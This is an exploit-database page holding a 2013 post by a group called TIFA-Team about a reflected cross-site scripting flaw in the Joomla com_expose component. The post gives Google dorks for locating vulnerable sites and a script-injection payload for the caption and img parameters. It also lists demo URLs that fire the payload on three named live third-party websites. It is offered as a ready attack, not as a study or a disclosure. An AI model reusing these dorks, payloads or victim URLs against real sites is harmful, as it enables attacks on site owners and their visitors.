0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Component com_expose XSS Vulnerability
================================================ Joomla Component com_expose Critical XSS Vulnerability ================================================ +++++++++++++++++ ++ C L O U D X ++ +++++++++++++++++ ############################################################## # Exploit Title: Joomla com_expose Critical XSS Vulnerability # Author: Cloudx # Date : 12/7/2013 # Facebook Profile: www.fb.com/cloudmrx # FaceBook Page : www.fb.com/TIFA.T3am # Email : mr.x.hack[at]live[dot]com # Category:: webapps # Google Dork 1: inurl:"components/com_expose/showpic.html" # Google Dork 2: inurl:"index.php?option=com_expose" # platform : php # Vendor: [ N / A ] # Download : Search Here > http://extensions.joomla.org/ < # Security Risk : Medium # Tested on: [Windows 8 64bit ] ######## ======================== 1)Exploit 2)Real.Demo 3)Snapshot ======================== 1)Exploit ========= exploit : ?img=&caption="><Script>alert('Cloudx')</Script> Ex. http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption="><Script>alert('Cloudx')</Script> 2) Exploit .demo : ============ http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E 3) Snapshot : ============ http://i.imgur.com/0RMIE7N.png [~] P0c [~] : ============ Vuln file in : http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption= <<-----| [~] D3m0 [~] : ============= http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E http://www.progressor.ca/components/com_expose/showpic.html?img=%22%3E%3Cscript%3Ealert('cloudx')%3C/script%3E http://www.jadeco.ir/int/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E =================================**TIFA-Team**=============================================== ##### GreetZ To : TIFA-Team > Cloudx, CityHunter, Abu-3mar, Karamzaza ##### ##### MSTHTR, Dr.Black, Smail Max, hunter rim, Mr.Ghost,The Blitz ##### ##### Free Palestine <3 , Free Syria <3 ##### ============================================================================================== TIFA --> T = This , I = Is , F = For , A = Allah # Facebook Profile: www.fb.com/cloudmrx # FaceBook Page : www.fb.com/TIFA.T3am # 0day.today [2024-06-28] #